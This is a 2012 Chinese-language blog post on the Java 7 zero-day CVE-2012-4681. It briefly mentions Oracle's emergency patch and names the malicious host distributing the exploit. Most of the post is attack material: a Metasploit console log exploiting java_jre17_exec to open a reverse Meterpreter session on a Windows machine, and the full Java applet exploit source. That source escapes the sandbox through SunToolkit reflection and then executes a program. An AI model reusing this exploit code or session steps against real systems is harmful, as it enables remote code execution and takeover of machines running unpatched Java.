Chinaunix首页 | 论坛 | 博客
  • 博客访问: 398044
  • 博文数量: 42
  • 博客积分: 1181
  • 博客等级: 少尉
  • 技术积分: 602
  • 用 户 组: 普通用户
  • 注册时间: 2012-02-28 22:19
文章分类

全部博文(42)

文章存档

2012年(42)

分类: 网络与安全

2012-09-01 02:48:09

这次CVE-2012-4681最厉害的地方在于跨平台(, 这不正是Java的优点吗?)不管是哪一个平台哪一个浏览器都受到影响。

而且这次Oracle 终于破例在每季定期更新外提前推出更新修正CVE-2012-4681, CVE-2012-1682, CVE-2012-3136 CVE-2012-0547

而这次4681红的是ok.aa24.net ok.aa24.net 也早就被列为危险名单。

如果不理警告坚持要看的话就像这样


接下来Tracert 一下就会发现IP居然是中华电信的,这算是台湾之光吗? XDD


对了 meterpreter 已经有攻击包了喔  XDD


点击(此处)折叠或打开

  1. _ _
  2. / \ / \ __ _ __ /_/ __
  3. | |\ / | _____ \ \ ___ _____ | | / \ _ \ \
  4. | | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
  5. |_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
  6. |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
  7. =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
  8. + -- --=[ 996 exploits - 484 auxiliary - 148 post
  9. + -- --=[ 251 payloads - 27 encoders - 8 nops
  10. =[ svn r15451 updated 77 days ago (2012.06.11)
  11. Warning: This copy of the Metasploit Framework was last updated 77 days ago.
  12. We recommend that you update the framework at least every other day.
  13. For information on updating your copy of Metasploit, please see:
  14. msf > use exploit/multi/browser/java_jre17_exec
  15. msf exploit(java_jre17_exec) > exploit
  16. [*] Exploit running as background job.
  17. [*] Started reverse handler on 192.168.1.131:4444
  18. [*] Using URL:
  19. [*] Local IP:
  20. [*] Server started.
  21. msf exploit(java_jre17_exec) > [*] 192.168.1.132 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
  22. [*] 192.168.1.132 java_jre17_exec - Sending Applet.jar
  23. [*] 192.168.1.132 java_jre17_exec - Sending Applet.jar
  24. [*] Sending stage (30216 bytes) to 192.168.1.132
  25. [*] Meterpreter session 1 opened (192.168.1.131:4444 -> 192.168.1.132:1373) at Mon Aug 27 11:32:26 +0200 2012
  26. msf exploit(java_jre17_exec) > sessions -i 1
  27. [*] Starting interaction with 1...
  28. meterpreter > sysinfo
  29. OS : Windows XP 5.1 (x86)
  30. Computer : home-7f7a6a7e2e
  31. Meterpreter : java/java
  32. meterpreter >


点击(此处)折叠或打开

  1. //
  2. // CVE-2012-XXXX Java 0day
  3. //
  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
  5. //
  6. // secret host / ip : ok.aa24.net / 59.120.154.62
  7. //
  8. // regurgitated by jduck
  9. //
  10. // probably a metasploit module soon...
  11. //
  12. package cve2012xxxx;
  13. import java.applet.Applet;
  14. import java.awt.Graphics;
  15. import java.beans.Expression;
  16. import java.beans.Statement;
  17. import java.lang.reflect.Field;
  18. import java.net.URL;
  19. import java.security.*;
  20. import java.security.cert.Certificate;
  21. public class Gondvv extends Applet
  22. {
  23. public Gondvv()
  24. {
  25. }
  26. public void disableSecurity()
  27. throws Throwable
  28. {
  29. Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
  30. Permissions localPermissions = new Permissions();
  31. localPermissions.add(new AllPermission());
  32. ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
  33. AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
  34. localProtectionDomain
  35. });
  36. SetField(Statement.class, "acc", localStatement, localAccessControlContext);
  37. localStatement.execute();
  38. }
  39. private Class GetClass(String paramString)
  40. throws Throwable
  41. {
  42. Object arrayOfObject[] = new Object[1];
  43. arrayOfObject[0] = paramString;
  44. Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
  45. localExpression.execute();
  46. return (Class)localExpression.getValue();
  47. }
  48. private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
  49. throws Throwable
  50. {
  51. Object arrayOfObject[] = new Object[2];
  52. arrayOfObject[0] = paramClass;
  53. arrayOfObject[1] = paramString;
  54. Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
  55. localExpression.execute();
  56. ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
  57. }
  58. public void init()
  59. {
  60. try
  61. {
  62. disableSecurity();
  63. Process localProcess = null;
  64. localProcess = Runtime.getRuntime().exec("calc.exe");
  65. if(localProcess != null);
  66. localProcess.waitFor();
  67. }
  68. catch(Throwable localThrowable)
  69. {
  70. localThrowable.printStackTrace();
  71. }
  72. }
  73. public void paint(Graphics paramGraphics)
  74. {
  75. paramGraphics.drawString("Loading", 50, 25);
  76. }
  77. }

阅读(4316) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~